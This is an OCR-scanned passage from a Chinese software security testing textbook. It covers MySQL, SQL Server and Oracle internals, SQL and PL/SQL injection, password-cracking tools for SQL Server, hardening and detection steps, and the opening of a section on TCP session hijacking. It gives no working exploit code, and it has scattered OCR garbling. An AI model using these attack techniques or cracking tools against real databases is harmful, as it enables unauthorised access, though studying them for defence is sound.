与 其 他 常用 关系 数据 库 管理 系统 一 样 ，MySQL 数据 库 逻 辑 上 由 表 组 成 ， 表 包含 在 表 空 
间 中 ， 它 在 物理 上 存储 为 数据 文件 。 每 一 个 MySQL 数据 库 都 映射 为 MySQL 数据 目录 下 的 
一 个 目录 ， 数 据 库 中 的 每 一 个 表 都 映射 为 数据 库 目 录 下 的 一 个 文件 。 从 安全 上 看 ，MySQL 
易 受 到 攻击 ， 原 因 在 于 读 取 存 储 在 这 些 文件 中 的 数据 相对 要 容易 些 。 另 外 ， 从 5.0.2 版 开始 ， 
通过 查询 一 组 INFORMATION SCHEMA 视图 ， 能 从 MySQL 中 提取 到 源 数据 ， 而 这 些 视图 
也 是 基于 保存 在 MySQL 数据 库 中 的 数据 得 到 的 。MySQL 在 实现 SQL 时 对 标准 提供 了 变通 
支持 ， 并 包括 了 一 个 启动 MySQL 服务 器 时 用 于 选择 ANSI 模式 的 开关 。MySQL 在 版 本 演化 
过 程 中 变化 较 大 ， 与 ANSI 的 兼容 性 的 变化 也 很 大 。 如 触发 器 这 样 的 功能 ， 它 仅 从 5.0 版 才 
开始 提供 基本 的 支持 ， 在 此 版 本 之 前 ， 它 不 支持 存储 过 程 。 

有 多 种 方式 查询 MySQL， 主 要 包括 : MySQL 命令 行 工 具 ; MySQL 控制 中 心 tnysqlcc)， 
这 是 一 个 独立 于 平台 的 图 形 用 户 界 面 工 具 ; MySQL 查询 浏览 器 (MySQL Query Browser), 3X 
是 mysglec 的 一 个 更 新 版 本 。 

3. SQL Server 数据 库 


SQL Server 是 微软 提供 的 关系 数据 库 管理 系统 ， 它 的 第 一 版 于 1989 年 发 行 ， 由 于 它 是 
微软 的 产品 ,因此 只 支持 Windows 平台 。 这 个 数据 库 的 最 新 版 本 为 SQL Server 2005， 按 照 微 
软 的 官方 说 法 ， 它 是 用 于 大 规模 联机 事务 处 理 (OLTP)、 数 据 仓 库 和 电子 商务 应 用 的 数据 库 平 
台 ， 也 是 用 于 数据 集成 、 分 析 和 报表 解决 方案 的 商业 智能 平台 。 

SQL Server 数据 库 的 数据 逻辑 上 表示 为 数据 库 表 ， 物 理 上 存储 在 一 个 或 多 个 操作 系统 数 
据 文件 中 。SQL Server 使 用 了 4 个 系统 数据 库 ， 这 些 数据 库 在 创建 数据 库 服务 器 时 生成 ， 并 
且 是 SQL Server 服务 器 正常 运行 不 可 或 缺 的 基础 。 

SQL Server 使 用 Transact-SQL(T-SQL) 作 为 它 的 查询 语言 ，T-SQL 是 标准 SQL 的 一 种 变 
体 ， 可 以 直接 在 命令 行 工具 osql 中 运行 SQL 查询 ， 也 可 以 使 用 它 的 图 形 界面 工具 “企业 管 
理 器 ”来 提取 数据 和 执行 SQL。 


6.6.2 ”攻击 SQL Server 数据 库 


本 节 介 绍 数据 库 系统 的 一 些 潜在 攻击 点 , 主要 精力 集中 在 SQL Server 数据 库 上 , 但 它们 
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包含 的 思想 绝 大 多 数 能 运用 到 所 有 关系 数据 库 管理 系统 上 。 在 攻击 数据 库 系 统 时 , DBA 的 工 
具 箱 通常 就 是 攻击 者 的 工具 箱 ，SQL Server 的 两 个 标准 工具 (查询 分 析 器 和 命令 行 工具 osq]) 
也 是 数据 库 攻击 者 工具 箱 中 的 两 个 常用 工具 。 

1. SQL 注入 


Web 应 用 通常 都 会 使 用 数据 库 ， 为 用 户 提 供 读 、 写 数据 的 能 力 。 但 大 量 Web 应 用 都 存 
在 SQL 注入 (SQL Injection) 漏 洞 。 简 单 地 说 ，SQL 注入 是 指 攻击 者 通过 修改 Web 应 用 要 发 送 
给 数据 库 的 SQL 语句 ， 达 到 获得 某 些 他 想 得 知 的 数据 (或 完成 某 个 操作 ) 的 目的 。 如 果 想 要 深 
入 理解 这 个 概念 ， 则 需要 了 解 一 些 关 于 SQL 的 知识 。 


存储 过 程 由 一 条 或 多 条 SQL 语句 组 成 ， 它 通过 过 程 名 称 进行 调用 。 绝 大 多 数 关系 数据 
库 管理 系统 都 支持 存储 过 程 。 一 般 来 说 , 程序 员 会 将 几 条 SQL 语句 封装 到 存储 过 程 中 ， 完 成 
一 个 完整 的 多 外 过 程 。 

SQL Server 提供 了 很 多 内 置 的 存储 过 程 ， 称 为 系统 存储 过 程 和 扩展 存储 过 程 。 这 些 存储 
过 程 在 数据 库 服务 器 的 标准 安装 中 默认 地 进行 安装 。 尽 管 绝 大 多 数 存 储 过 程 者 是 数据 库 正常 
运行 所 需 的 工具 ， 但 其 中 的 一 些 存储 过 程 能 被 攻击 者 利用 ， 从 而 对 数据 库 造成 危险 。 许 多 系 
统 存储 过 程 对 于 数据 库 应 用 开发 都 十 分 有 用 ， 但 在 生产 环境 中 许多 系统 都 没有 去 除 这 些 存储 
过 程 。 兽 经 有 一 段 时 间 ， 人 们 建议 把 最 危险 的 存储 过 程 彻底 地 从 系统 中 删除 ， 但 这 种 做 法 全 
对 数据 库 系 统 的 其 他 方面 造成 重大 冲击 。 因 此 ， 现 实 的 做 法 是 ， 通 过 严格 控制 存储 过 程 的 使 
权限 来 最 大 限度 降低 它们 所 带 来 的 安全 风险 。 

3. 连接 字符 串 与 口令 破解 


为 在 Web 应 用 中 连接 数据 库 ， 很 多 Web 开发 者 采用 硬 编码 方式 将 连接 字符 串 定义 在 配 
置 文件 中 ， 如 web.config 或 global.asa。 

SQL Server 将 用 户 名 和 口令 存储 在 master 数据 库 的 sysxlogins 表 中 。 口 令 使 用 名 为 
pwdencrypt0 的 存储 过 程序 列 。 然 而 遗憾 的 是 ，SQL Server 不 仅 存储 了 口令 的 散 列 结果 ， 而 且 
是 对 口令 进行 大 写 归 一 化 后 散 列 , 因此 减少 了 口令 的 可 用 空间 , 使 得 口令 破解 变 得 更 加 简单 。 

现在 有 各 种 各 样 用 于 暴力 破解 SQL Server 口令 的 工具 ， 包 括 : 

。 SQLAT 一 一 以 暴力 攻击 模式 或 字典 攻击 模式 运行 的 口令 审计 工具 。 

。 SQLDict 一 一 字典 攻击 工具 。 

此 外 ， 下 面 的 存储 过 程 也 能 完成 类 似 任务 : 

e FindSA 一 一 用 于 得 到 SA 口令 的 暴力 破解 工具 ; 

。 FindSADic 一 一 用 于 得 到 SA 口令 的 字典 攻击 工具 。 


6.6.3 攻击 Oracle 数据 库 


攻击 Oracle 数据 库 服务 器 的 第 一 步 工 作 是 找到 Oracle 服务 器 , 在 知道 它 在 什么 机 器 上 运 
行 后 ，TCP 端口 扫描 是 找到 Oracle 数据 库 服务 器 的 有 效 途径 。Oracle 及 其 辅助 进程 侦 听 众多 
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的 不 同 端口 ， 虽 然 这 些 端口 可 以 设置 ， 但 多 数 情况 下 人 们 会 全 部 或 部 分 使 用 默认 端口 。 
PL/SQL 是 Oracle 版 本 的 SQL， 它 用 于 创建 存储 过 程 、 函 数 、 触 发 器 及 对 象 。PL/SQL 

是 Procedural Language/SQL 的 缩写 ， 也 是 操作 Oracle 数据 库 的 主要 工具 。 对 于 专门 从 事 数据 

库 攻击 的 人 来 讲 ， 应 该 阅读 一 本 详细 介绍 PL/SQL 的 图 书 。 

PL/SQL 注入 是 一 种 与 Oracle 存储 过 程 相关 的 重要 攻击 技术 。 利 用 PL/SQL 注入 ， 攻 于 

者 能 够 提升 其 权限 ， 从 较 低级 的 PUBLIC 账户 提升 为 具有 DBA 权限 的 账户 。 这 项 技术 适 | 

于 几乎 所 有 Oracle 版 本 ， 能 用 于 攻击 定义 存储 过 程 和 Oracle 本 身 自 带 的 存储 过 程 。 


6.6.4 保护 SQL Server 的 安全 


为 了 方便 开发 和 使 用 数据 库 ，SQL Server 在 默认 安装 中 提供 了 一 个 便利 的 开发 环境 ， 它 
提供 了 丰富 的 特性 ， 包 括 示 例 数据 库 、 完 整 的 存储 过 程 及 其 他 用 于 方便 管理 和 使 用 数据 库 的 
特性 。 但 是 ， 这 些 便 利 的 开发 环境 工具 在 生产 环境 中 却 可 能 会 带 来 众多 不 安全 因素 ， 成 为 网 
络 的 后 门 。 因 此 ， 必 须 在 SQL Server 投入 生产 环境 之 前 ， 实 现 一 组 标准 的 安全 防护 ， 从 而 让 
生产 环境 变 得 安全 可 靠 起 来 。 

1. 用 户 认证 


与 其 他 绝 大 多 数 关系 数据 库 管理 系统 一 样 ，SQL Server 能 够 管理 其 自身 的 安全 并 在 内 部 
维护 其 用 户 和 口令 ， 它 所 使 用 的 数据 库 表 为 sysxlogins。SQL Server 支持 两 种 认证 方式 : 本 地 
的 SQL Server 认证 ( 称 为 混合 模式 ) 和 Windows 认证 。 用 户 可 在 安装 SQL Server 时 配置 认证 模 
式 ， 也 能 够 在 安装 后 修改 认证 模式 。 

Windows 认证 使 用 Windows 集成 安全 自动 认证 要 登录 到 数据 库 的 用 户 , 它 利 用 了 用 户 登 
录 域 时 所 用 的 凭据 。 混 合 模式 认证 既 允 许 用 户 使 用 自己 的 Windows 凭据 登录 数据 库 ， 也 允许 
用 户 使 用 基于 SQL Server 的 安全 登录 数据 库 。 不 论 使 用 哪 一 种 登录 方式 ， 都 必须 在 数据 库 
级 创建 登录 用 户 。 如 果 采 用 了 SQL Server 登录 , 那么 口令 以 单 向 散 列 方式 存储 在 sysxlogins 
表 中 。 

其 实 , 使 用 Windows 认证 模式 本 质 上 更 安全 ,原因 在 于 口令 管理 的 完整 性 ， 如 口令 最 短 
长 度 、 多 次 无 效 登录 后 的 账户 锁定 等 。 如 果 认 证 模式 从 混合 模式 改 为 Windows 模式 ， 那 么 已 
有 的 任何 SQL Server 登录 用 户 都 不 再 有 效 ， 不 能 再 通过 认证 登录 数据 库 服务 器 。 

2. 服务 账户 


在 标准 SQL Server 安装 过 程 中 ， 默 认 地 安装 了 许多 服务 ， 使 用 SQL Server 正常 发 挥 功 
能 必须 运行 的 服务 是 MSSQLServer 服务 。 但 SQL Server 调度 代理 SQLServerAgent 通常 在 标 
准 安装 后 都 会 被 安装 和 运行 。 除 了 这 两 个 服务 之 外 ， 默 认 安 装 还 会 安装 下 述 服务 : 
MSSQLServerADHelper. MSDTC(Distributed Transaction Coordinator) 和 MSSearch Services. 

关闭 未 使 用 的 服务 有 助 于 缩小 攻击 者 攻击 面 ， 这 是 一 种 良好 的 实践 策略 。 如 果 选 择 了 默 
认 安 装 ， 这 些 服 务 都 将 被 安装 ， 并 运行 在 本 地 系统 账户 中 。 本 地 系统 账号 在 本 地 机 器 上 拥有 
一 些 权限 ， 包 括 两 种 形式 : 以 操作 系统 方式 操作 (Act as Part of the Operating System 和 生成 安 
全 审核 (Generate Security Audits)。 用 户 应 该 让 服务 器 运行 在 不 必 是 本 地 管理 用 户 组 或 域 管理 


ET 
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户 组 成 员 的 域 用 户 账户 下 , 并 且 确 保 运 行 服务 的 账户 拥有 能 够 让 服务 正常 运行 的 最 小 权限 。 
3. Public 角色 


与 Windows 一 样 ， 每 个 SQL Server 安装 都 有 一 些 预 先 定义 的 角色 。 这 些 不 同 的 角色 能 
够 影响 整个 服务 器 的 权限 级 别 或 单个 数据 库 的 权限 级 别 ， 其 中 最 重要 的 一 个 角色 是 Public 角 
色 ， 它 被 授予 数据 库 级 别 的 权限 。 每 一 个 数据 库 都 拥有 Public 角色 ， 添 加 到 数据 库 中 的 每 一 
个 用 户 都 是 Public 角色 的 一 个 成 员 。 这 种 约定 无 法 改变 ， 用 户 既 不 能 删除 Public 角色 ， 也 不 
能 从 这 个 角色 中 删除 成 员 。 因 此 ， 必 须 小 心 谨慎 地 管理 Public 角色 的 权限 。 

4. Guest 账户 


SQL Server 中 有 一 个 称 为 Guest 的 账户 。 如 果 这 个 Guest 账户 是 数据 库 级 账户 ， 那 么 任 
何 登录 都 能 够 访问 数据 库 。 由 于 Guest 账户 是 Public 角色 的 成 员 ， 通 过 这 个 账户 访问 数据 库 
的 任何 用 户 都 拥有 Public 角色 拥有 的 权限 ， 而 无 须 经 过 授权 。 为 了 降低 Guest 账户 引发 的 风 
Wy, R model 数据 库 中 不 包含 这 个 账户 ， 因 为 model 数据 库 是 新 创建 所 有 用 户 数据 库 
时 使 用 的 模板 。 此 外 ， 需 要 定期 审计 数据 库 用 户 ， 检 查 是 否 创 建 了 Guest 账户 。 

5. 网 络 库 


SQL Server 支持 集中 网 络 层 协议 与 客户 端 通信 。 这 些 协 议 包括 TCP/IP, IPX/SPX, Named 
Pipes 和 AppleTalk。 为 完成 这 些 通信 ，SQL Server 使 用 称 为 网 络 库 ( 或 Net-Libraries) 的 动态 链 
接 库 来 进行 通信 ， 要 求 在 服务 器 和 客户 端 都 安装 这 些 网 络 库 。 如 果 客 户 端 和 服务 器 端的 配置 
支持 相同 网 络 库 ， 客 户 端 发 起 连接 ， 则 只 能 与 SQL Server 进行 通信 。 需 要 注意 的 是 ， 不 要 混 
淆 网 络 协议 和 网 络 库 ， 虽 然 它们 的 名 字 很 接近 ， 但 一 般 来 说 ， 一 个 网 络 库 可 以 支持 多 个 网 络 
协议 ，SQL Server 的 默认 安装 使 用 了 TCP/IP 和 Named Pipes 网 络 协议 。 

虽然 攻击 者 不 能 攻击 SQL Server 的 网 络 库 , 但 网 络 库 表 明了 客户 端 用 于 通信 的 协议 。 开 
发 超过 需要 的 网 络 库 只 会 给 系统 带 来 更 大 的 风险 。 一 般 来 说 , 只 要 有 可 能 , 就 应 该 使 用 TCP/IP 
网 络 库 ， 原 因 在 于 它 有 较 快 的 速度 和 较 好 的 安全 性 。 另 外 ， 使 用 TCP/IP 网 络 库 还 可 以 修改 
SQL Server 的 默认 端口 (默认 端口 1433)， 选 择 选项 “隐藏 服务 器 (Hide server)” 后 ， 可 将 默认 
端口 切换 为 TCP 2433， 但 微软 不 建议 修改 默认 端口 。 


6.6.5 ”保护 Oracle 的 安全 


保护 Oracle 的 安全 是 十 分 艰巨 的 任务 。 原 因 很 简单 ，Oracle RDBMS 实在 太 庞大 了 。 本 
节 将 介绍 一 些 有 助 于 保护 Oracle 环境 安全 的 简单 措施 。 


1) 设置 TNS Listener 口令 与 打开 Admin Restrictions 

默认 情况 下 ，TNS Listener 没有 设置 口令 , 它 能 被 任何 人 员 通 过 远程 连接 来 维护 (这 种 做 法 
在 Oracle 10g 中 已 经 被 修改 )。 设 置 Listener 的 口令 将 能 有 效 地 阻止 对 Listener 的 非 授权 管理 。 

通过 打开 Admin Restrictions， 将 阻止 对 Listener 的 非 授权 维护 。 当 Admin Restrictions 1T 
开 之 后 ， 即 使 提供 了 Listener 的 口令 ， 某 些 命令 也 不 能 远程 执行 。 


第 6 章 软件 攻击 传统 方式 及 领域 * 263 * 


2) 打开 TCP 有 效 节点 检查 
TOP 有 效 节 点 检查 用 于 允许 某 些 主机 连接 到 数据 库 服务 器 ， 而 阻止 另 一 些 主机 连接 到 数 
据 库 ， 从 而 将 脆弱 数据 库 的 主机 限定 在 某 个 已 知 范围 内 。 


3) 关闭 XML 数据 库 与 关闭 外 部 过 程 

XML 数据 库 CXDB) 提 供 了 两 项 服务 : 一 个 是 侦 听 TCP2100 端口 的 FTP 服务 ， 另 一 个 是 
侦 听 TCP8080 端口 的 HTTP 服务 。 如 果 我 们 没有 使 用 这 些 服务 ， 那 么 就 应 该 关闭 它 。 

外 部 过 程 让 PL/SQL 过 程 能 够 调用 操作 系统 共享 对 象 (比如 DLL) 的 功能 。 这 种 调用 存在 
潜在 的 威胁 ， 如 果 不 需要 这 种 功能 ， 就 应 该 及 时 关闭 它 。 编 写 PL/SQL 代码 的 开发 人 员 应 该 
尽 可 能 地 避免 使 用 外 部 过 程 。 


4) 加 密 网 络 通 信 

加 密 网 络 通 信 设 置 仅仅 适用 于 Oracle Enterprise Edition, 在 这 个 版 本 中 , 应 该 使 用 Oracle 
Advanced Security 加 密 客户 端 与 数据 库 服务 器 之 间 的 流量 , 使 用 Oracle Net Manager 工具 设置 
这 个 选项 。 

侵入 Oracle 服务 器 最 容易 的 方法 或 许 是 得 到 它 的 用 户 名 和 口令 。 因此， 所 有 未 使 用 账户 
都 应 该 锁定 或 使 其 过 期 ， 可 使 用 数据 库 配置 助手 DCA，Database Configuration Assistant) 来 完 
成 这 个 任务 。 


6.6.6 ”检测 数据 库 攻击 
数据 库 攻击 经 常 发 生 在 代码 编写 得 糟糕 的 情况 下 。 下 面 介绍 检测 数据 库 攻 击 的 方法 。 
1. 审计 与 失败 登录 


审计 通常 是 数据 库 管 理 员 识别 数据 库 的 非 授权 访问 或 访问 企图 的 第 一 个 步骤 。 访 问 审 计 
比较 容易 设置 ， 可 在 服务 器 级 或 数据 库 级 配置 访问 审计 。 除 了 Windows 事件 日 志 外 ，SQL 
Server 提供 了 自己 的 出 错 日 志 记录 系统 。 当 在 SQL Server 中 配置 访问 审计 时 ， 审 计 事 件 同 时 
写 入 到 两 个 日 志 中 。SQL Server 提供 了 4 个 级 别 的 审计 : 无 (None) 一 一 不 记录 登录 尝试 ; 成 
功 (Success) 一 一 只 有 成 功 登录 被 写 入 到 日 志 ; 失败 (Failure) 一 一 只 有 失败 登录 被 写 入 到 日 志 ; 
所 有 (AI) 一 一 每 一 个 登录 数据 库 的 尝试 都 被 记录 到 日 志 中。 作为 进一步 提高 保护 层次 的 一 种 
手段 ， 也 可 以 使 用 入 侵 检测 系统 (IDS) 来 阻止 非 授权 访问 。 

与 其 他 应 用 程序 一 样 ，SQL Server 的 口令 也 能 够 被 暴力 破解 。 前 面 已 经 介绍 过 一 些 用 于 
暴力 破解 SQL Server 口令 的 工具 。 在 打开 失败 登录 监控 后 ， 当 发 生 暴 力 破解 SQL Server 口令 
的 现象 时 ， 日 志 中 就 会 产生 大 量 失 败 登录 记录 。 

2. 系统 存储 过 程 与 SQL 注入 


SQL Server 提供 了 众多 系统 存储 过 程 ，sp_password 便 是 用 于 添加 或 修改 SQL Server 登 
录 的 口令 。 这 个 存储 过 程 在 应 用 中 有 一 个 特性 : 每 当 调用 这 个 存储 过 程 时 ， 系 统 就 会 识别 出 
名 称 ps password， 因 此 整 条 语句 都 从 工具 中 隐藏 起 来 。 

SQL 注入 的 本 质 使 得 检测 这 种 攻击 几乎 不 可 能 , 不 管 这 种 检测 是 实时 检测 还 是 其 他 某 种 
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类 型 的 审计 检测 ， 即 使 是 IDS 也 几乎 检测 不 到 SQL 注入 。 防 止 SQL 注入 攻击 的 唯一 有 效 手 
段 是 实现 全 面 的 代码 评审 并 在 生产 系统 中 严格 遵从 编码 标准 。 确 保 整 个 应 用 程序 中 都 进行 输 
入 有 效 性 认证 , 对 输入 数据 进行 检查 ,删除 任何 具有 潜在 危险 的 字符 ， 如 单 引号 () 和 分 号 (:)。 


6.6.7 


防止 数据 库 攻 击 


防止 数据 库 攻击 需要 做 多 方面 的 工作 ， 有 些 工 作 很 简单 ， 而 另 一 些 工作 可 能 会 带 来 庞大 
的 维护 任务 , 从 而 只 能 在 一 些 高 风险 环境 中 应 用 。 下 面 是 一 些 防止 数据 库 攻击 的 预防 性 措施 : 


服务 包 和 补丁 ， 及 时 更 新 操作 系统 和 数据 库 应 用 的 所 有 服务 包 和 修补 包 。 

物理 安全 : 数据库 服务 器 应 该 放 在 一 个 物理 安全 的 环境 中 ， 因 为 潜在 的 攻击 者 既 可 
以 在 单位 之 外 ， 也 可 以 在 单位 之 内 。 

防火 墙 规则 : 使 用 防火 墙 阻塞 UDP 端口 1434, 这 个 端口 是 蠕虫 病毒 Slammer 的 攻 入 
点 ，SQL Server 的 正常 工作 不 要 求 开 放 这 个 端口 。 

关闭 不 使 用 的 特性 : 如 果 系统 中 不 需要 使 用 SQL Mail 或 其 他 一 些 特 性 ， 那 就 关闭 这 
些 特性 。 如 果 没 有 调度 或 报警 需求 ， 那 么 SQL Agent 就 不 需要 运行 。 当 关闭 了 这 些 
特性 后 ， 就 减少 了 服务 器 受到 攻击 的 机 会 。 

分 析 工 具 : 可 使 用 各 种 工具 来 寻找 系统 中 存在 的 潜在 漏洞 。 微 软 的 安全 审计 工具 
Microsoft Baseline Security Analyzer(MBSA) 可 以 报告 服务 器 上 存在 的 安全 问题 。 

审计 共享 文件 夹 的 权限 : 确保 没有 为 了 方便 文件 访问 而 共享 了 NTFS 文件 夹 。 如 果 
将 SQL Server 安装 在 Windows 域 账 户 下 ， 那 么 该 账户 被 自动 授予 访问 SQL Server 
需要 使 用 的 所 有 文件 夹 。 如 果 随 后 改变 了 SQL Server 的 运行 用 户 ， 而 这 些 权 限 又 没 
有 被 收回 的 话 ， 就 会 给 这 个 用 户 遗 留 下 不 必要 的 访问 权限 。 

服务 账户 和 sa 账户 :这 是 两 个 最 经 常 被 攻击 的 账户 ， 应 该 为 它们 设置 复杂 的 口令 。 
如 果 使 用 混合 模式 的 话 ， 每 一 个 账户 都 要 使 用 复杂 口令 。SQL Server 存储 口令 的 方 
法 并 不 十 分 安全 ， 此 外 ， 它 也 不 能 强制 实施 口令 规则 。 

Guest 账户 ， 除 了 Master 和 Tempdb 外 ， 从 所 有 数据 库 删 除 这 个 账户 ， 因 为 Master 
和 Tempdb 数据 库 需 要 使 用 这 个 账户 来 正常 地 工作 。 在 工作 数据 库 中 如 果 要 保留 Guest 
账户 ， 那 么 将 它 的 权限 设置 得 尽 可 能 地 低 些 。 

输入 有 效 性 评估 : 不 要 允许 互联 网 应 用 随意 地 查询 数据 库 ， 取 而 代 之 的 是 ， 使 用 存 
储 过 程 访问 数据 库 资源 。 

数据 库 和 IS 服务 器 : 应 将 数据 库 服 务 器 和 ITS 服务 器 放 在 不 同 应 用 平台 上 ， 并 在 数 
据 库 服务 前 面 加 装 一 个 防火 墙 ， 阻止 外 部 用 户 对 数据 库 的 访问 。 这 样 就 对 数据 库 的 
安全 增加 了 一 道 防护 屏障 。 

Windows 域 : 只 要 有 可 能 ， 就 使 用 Windows 域 ， 这 样 可 以 运用 集成 安全 模式 ， 它 比 
SQL Server 的 安全 方式 有 很 大 提高 。 

信任 连接 : 例如 ， 当 使 用 命令 行 工具 查询 工具 osql 时 ， 使 用 -E 选项 ， 避 免 在 批 处 理 
TASTAN 4. 

SQL Server 服务 账户 : 在 Windows 域 中 ， 应 该 使 用 域 用 户 。 它 不 需要 是 本 地 系统 账 
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户 或 管理 员 组 成 的 成 员 ， 绝 大 多 数 情况 下 ， 也 不 需要 是 本 地 管理 员 。 采 用 最 低 权 限 
策略 确保 了 即使 服务 器 被 攻 入 ， 攻 击 者 能 执行 服务 账户 上 下 文中 的 命令 ， 它 也 依然 
受到 该 账户 权限 的 约束 。 

。 Model 数据 库 : 由 于 Model 数据 库 提供 了 新 创建 的 所 有 数据 库 的 模板 ,因此 它 也 应 该 
内 建安 全 模板 ， 这 样 无 论 谁 创建 新 的 数据 库 ， 系 统 中 创建 的 每 个 数据 库 都 拥有 了 最 
大 程度 的 安全 性 。 

* Public 角色 : 定期 审计 权限 。 由 于 每 个 数据 库 用 户 都 自动 成 为 Public 角色 的 成 员 ， 

因此 严格 控制 这 个 角色 的 权限 十 分 必要 。 

e 扩展 存储 过 程 ， 对 所 有 潜在 易 受 攻击 的 系统 存储 过 程 都 严格 地 控制 其 权限 ， 并 定期 
审计 它们 的 权限 。 这 样 可 以 避免 无 意义 的 权限 修改 或 粗心 开发 人 员 的 权限 修改 带 来 
的 安全 风险 。 

。 网 络 库 ， 只 开放 系统 所 需要 的 网 络 库 ， 减 少 SQL Server 受到 攻击 的 接触 面 。 只 要 有 
可 能 ， 就 加 密 客户 端 与 Web 服务 器 之 间 的 通信 数据 。 

综 上 所 述 ， 要 针对 不 同 的 应 用 选择 合适 的 数据 库 系统 ， 架 设 完善 的 网 络 系统 和 选择 安全 

的 操作 系统 ， 所 有 这 些 都 是 数据 库 安全 保障 的 重要 基础 。 


67 本 章 小 结 


本 章 介绍 了 软件 攻击 的 传统 方式 及 领域 。 重 点 分 析 了 传统 的 木马 与 后 门 技术 ， 口 令 攻 击 
的 各 种 方式 及 防范 措施 ， 同 时 对 计算 机 病毒 、 网 络 安全 扫描 这 两 个 由 来 已 久 的 计算 机 安全 问 
题 进行 了 全 面 的 阐述 。Web 系统 、 数 据 库 作 为 传统 的 攻击 领域 ， 都 以 理论 基础 为 开头 ， 进 而 
分 析 了 攻击 者 如 何 利用 其 漏洞 来 实施 攻击 ; 同时 ， 在 每 种 攻击 方式 的 最 后 都 给 出 了 可 行 的 防 
范 措施 。 
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本 章 导 读 


本 章 分 析 了 常见 的 几 种 动态 渗透 技术 ， 并 以 OWASP TOP10 为 重点 , 详细 阐述 了 针对 Web 
应 用 系统 的 动态 攻击 方式 ， 为 下 一 章 HP WebInspect 的 学 习 打 下 理论 基础 。 

应 掌握 的 知识 要 点 : 

e 会 话 动 持 

。 服务 器 动态 渗透 

。 拒绝 服务 式 攻击 

OWASP TOP 10 

我 们 在 第 1 章 中 提 到 过 “渗透 测试 是 一 种 反 向 测试 "， 即 系统 在 真实 环境 下 ， 安 全 工程 
师 尽 可 能 完整 地 模拟 黑客 使 用 的 漏洞 发 现 技术 和 攻击 手段 ， 对 目标 网 络 、 系 统 主机 、 应 用 的 
安全 性 进行 深入 的 探测 ， 发 现 系统 最 脆弱 的 环节 的 过 程 。 因 此 ， 本 章 重点 分 析 目前 主流 的 动 
态 攻击 方式 及 原理 ， 为 后 面 动态 渗透 测试 工具 的 使 用 打下 理论 基础 。 


7.1 会 话 动 持 


现在 打 一 个 比喻 : 假设 你 去 市 场 买 菜 ， 在 交 完 钱 后 你 要 求 先 去 干 一 些 别 的 事情 ， 稍 后 再 
来 拿 菜 ， 如 果 这 个 时 候 某 个 陌生 人 要 求 把 菜 拿 走 ， 卖 菜 的 人 会 把 菜 给 陌生 人 吗 ? 当然 ， 这 只 
是 一 个 比喻 ， 但 这 恰恰 就 是 会 话 劫持 的 寓意。 所 谓 会 话 ， 就 是 两 台 主机 之 间 的 一 次 通信 。 例 
如 , 使 用 Telnet 登录 到 某 台 主机 , 这 就 是 一 次 Telnet 会 话 ; 浏览 某 个 网 站 时 , 这 就 是 一 次 HTTP 
会 话 。 

会 话 劫持 (Session Hijack) 是 一 种 结合 了 嗅 探 及 欺骗 技术 在 内 的 攻击 手段 。 广 义 上 说 ,会 
话 劫持 就 是 在 一 次 正常 的 通信 过 程 中 , 攻击 者 作为 第 三 方 参与 到 其 中 , 或 在 数据 流 ( 例 如 基于 
TOP 的 会 话 ) 里 注入 额外 信息 , 或 者 是 将 双方 的 通信 模式 暗中 改变 , 即 从 直接 联系 变 成 由 攻击 
者 联系 。 会 话 劫持 是 一 种 内 网 攻击 手段 ， 攻 击 者 可 以 通过 破坏 已 建立 的 数据 流 而 实现 劫持 。 
会 话 劫持 攻击 有 两 种 类 型 : 

1) 主动 型 ， 找 到 活动 会 话 ， 并 接管 这 个 会 话 ， 从 而 攻 入 目标 主机 。 

2) 被 动 型 ， 这 种 类 型 的 劫持 攻击 首先 劫持 会 话 ， 然 后 记录 目标 与 主机 之 间 的 所 有 流量 。 
主动 型 劫持 总 是 首先 完成 被 动 型 劫持 攻击 者 。 

另外 ， 还 要 区 分 会 话 重 放 (Session Replay) 和 会 话 支持 。 这 两 种 攻击 都 是 中 间 人 攻击 


* 268 。 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


(Man-in-the-Middle)， 但 在 会 话 重 放 中 ,中 间 人 捕获 数据 包 ， 并 在 发 送 给 目标 之 前 修改 其 中 的 
数据 。 而 在 真实 的 会 话 劫持 中 ， 通 过 假冒 源 主机 (或 目标 主机 )、 将 TCP 序列 号 修改 为 与 源 主 
机 和 目标 主机 相 匹 配 的 序列 号 ， 从 而 接管 中 会 话 。 常 见 的 情况 是 ， 在 假冒 源 主机 的 过 程 中 ， 
对 源 主机 发 起 拒绝 服务 攻击 ， 使 其 离线 。 


7.1.1 ”会话 动 持 的 工作 原理 


会 话 劫持 利用 了 TCP/IP 工作 原理 来 设计 攻击 。TCP 使 用 端 到 端的 连接 , 即 TCP 使 用 ( 源 
IP, 源 TCP 端 口号 , 目的 IP, 目的 TCP 端口 号 ) 来 唯一 标识 每 一 条 已 经 建立 连接 的 TCP 链 路 。 
另外 ，TCP 在 进行 数据 传输 时 ，TCP 报 文 首部 的 两 个 字段 序号 (seq) 和 确认 序号 (ackseq) 非 常 重 
要 。 序 号 (seq) 和 确认 序号 (ackseq) 是 与 所 携带 TCP 数据 净 荷 (payload) 的 多 少 有 数值 上 的 关系 : 
序号 字段 (seq) 指 出 了 本 报 文中 传送 的 数据 在 发 送 主机 所 要 传送 的 整个 数据 流 中 的 顺序 号 ， 而 
确认 序号 字段 (ackseq) 指 出 了 发 送 本 报 文 的 主机 希望 接收 的 对 方 主 机 中 下 一 个 八 位 组 的 顺序 
号 。 因此, 对 于 一 台 主 机 来 说 ,其 收发 的 两 个 相 临 TCP 报 文 之 间 的 序号 和 确认 序号 的 关系 为 : 
它 所 要 发 出 的 报 文中 的 seq 值 应 等 于 它 所 刚 收 到 的 报 文中 的 ackseq 的 值 ， 而 它 所 要 发 送 报 文 
中 ackseq 的 值 应 为 它 所 收 到 报 文中 seq 的 值 加 上 该 报 文中 所 发 送 的 TCP 净 荷 的 长 度 。 

TCP 会 话 劫持 的 攻击 方式 可 以 对 基于 TCP 的 任何 应 用 发 起 攻击 , 如 HTTP. FTP, Telnet 
等 。 对 于 攻击 者 来 说 ,所 必须 要 做 的 就 是 窥探 到 正在 进行 TCP 通信 的 两 台 主 机 之 间 传 送 的 报 
文 ， 这 样 攻击 者 就 可 以 得 知 该 报 文 的 源 IP. Js TCP 端 口号 、 目 的 耳 、 目 的 TCP 端口 号 ， 从 
而 可 以 得 知 其 中 一 台 主 机 对 将 要 收 到 的 下 一 个 TCP 报 文 段 中 seq 和 ackseq 值 的 要 求 。 这 样 ， 
在 该 合法 主机 收 到 另 一 台 合法 主机 发 送 的 TCP 报 文 前 ， 攻 击 者 根据 所 截获 的 信息 向 该 主机 发 
